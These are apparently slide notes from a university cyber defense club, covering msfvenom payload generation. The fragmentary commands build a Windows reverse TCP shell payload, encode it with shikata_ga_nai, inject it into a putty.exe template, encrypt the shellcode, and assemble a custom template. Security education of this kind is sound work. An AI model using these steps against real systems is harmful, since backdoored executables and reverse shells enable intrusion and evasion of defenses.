{{< slides >}}
UofL Cyber Defense
{{< asciinema vpYU4n7HklTHNPCTQDbLp64wl >}}
msfvenom -p [payload] -a [arch] --platform [plat] -f [filetype] LHOST=[host] LPORT=[port] -o [out]
msfvenom -l [option]
msfvenom -p windows/x64/shell_reverse_tcp -a x64 --platform windows -f raw
-e [enc] -u [iter]
--list encoders
x86/shikata_ga_nai
-x
-k
injct.exe
putty.exe
encrypting shellcode with --encrpyt
--encrpyt
command payloads
Alternative options:
"E:\Visual Studio 2022\VC\Tools\MSVC\14.41.34120\bin\Hostx64\x64\ml64" template_x64_windows.asm /link /subsystem:windows /defaultlib:\"C:\\Program Files (x86)\\Windows Kits\\10\\Lib\\10.0.20348.0\\um\\x64\\kernel32.lib" /entry:main"